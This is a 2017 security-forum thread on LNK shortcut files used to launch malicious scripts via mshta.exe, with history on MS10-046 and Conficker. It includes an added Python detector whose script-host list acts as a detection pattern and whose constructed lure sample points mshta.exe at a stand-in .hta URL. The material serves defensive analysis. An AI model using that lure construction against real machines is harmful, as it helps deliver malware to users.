LNK files again being used to deliver malicious PowerShell script

Discussion in 'malware problems & news' started by itman, May 26, 2017.

  1. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    https://www.scmagazine.com/lnk-file...r-malicious-powershell-script/article/664399/
     
  2. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    Per the Trend Micro source article link noted above, this is a clever trick being employed:
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    They were used at least as far back as 2010:

    Downloader-CJX Cashing In on Microsoft .LNK Flaw
    http://www.avertlabs.com/research/blog/index.php/category/exploit-research/
    Microsoft Security Bulletin MS10-046 - Critical
    Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198)
    Published: August 02, 2010
    https://technet.microsoft.com/en-us/library/security/ms10-046.aspx
    As with so many exploits patched by Microsoft, many users did not patch, so the exploit continued to be used successfully for quite a while.

    “double click for content” is an old lure that goes back at least to 2009. An RTF example:

    http://rsjphoto.net/computing/rtf/

    There you go!

    ----
    rich
     
  4. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    The difference with the current .lnk malware versus past use is those exploited vulnerabilities. The current strain of malware is using .lnk files as designed but using them to run legit processes such as mshta.exe to in turn run malware-laced scripts and the like.

    Nothing like using Windows to infect Windows!
     
    Last edited: May 26, 2017
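    Since these shortcuts are well-formed .lnk files, the defender's check is to read the target and argument fields straight out of the file (the shortcut Properties dialog truncates long targets) and flag a script host such as mshta.exe being handed an unusually long command line. The code below is an added example, not from any post in this thread or from the Trend Micro write-up; the `SCRIPT_HOSTS` list, the 64-character threshold and the two sample shortcuts are constructed assumptions.

```python
import struct

# LinkFlags bits from the Shell Link binary format (MS-SHLLINK).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
# Script hosts commonly launched by .lnk lures (assumed list; mshta.exe is the one named above).
SCRIPT_HOSTS = ("mshta", "powershell", "wscript", "cscript", "cmd", "rundll32")

def parse_lnk(data):
    """Return the StringData fields (name, relative_path, arguments, ...) of a .lnk."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00":
        raise ValueError("not a Shell Link header")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDListSize + LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # skip LinkInfo (its first dword is its total size)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += width * count
    return fields

def suspicious_lnk(data):
    """True when the target is a script host and the command line is unusually long."""
    f = parse_lnk(data)
    target = (f.get("relative_path", "") + " " + f.get("arguments", "")).lower()
    return any(h in target for h in SCRIPT_HOSTS) and len(f.get("arguments", "")) > 64

def build_lnk(rel_path, args):
    """Constructed sample: minimal Unicode .lnk carrying only RelativePath and Arguments."""
    hdr = bytearray(76)
    struct.pack_into("<I", hdr, 0, 76)                                  # HeaderSize
    hdr[4:20] = bytes.fromhex("0114020000000000c000000000000046")      # LinkCLSID
    struct.pack_into("<I", hdr, 20, HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (rel_path, args))
    return bytes(hdr) + body

# Constructed inputs: a lure-style shortcut with padded arguments, and an ordinary one.
SAMPLE_LURE = build_lnk(r"..\..\Windows\System32\mshta.exe", "http://example.invalid/x.hta " + "A" * 70)
SAMPLE_BENIGN = build_lnk(r"..\..\Windows\System32\notepad.exe", "notes.txt")
```

    Running `suspicious_lnk` over every .lnk in a mail attachment or download folder gives a quick triage list; the parsed `arguments` field is what the Properties dialog would have hidden.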
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Yes! In one sense, though, many exploits use Windows to infect Windows - the original LNK exploit used a vulnerability in the Windows Shell.

    Not using a legitimate file as in this case, of course... which reminds me of Conficker's later versions which used autorun to start rundll32.exe to run its malicious DLL.

    ----
    rich
     
    Last edited: May 26, 2017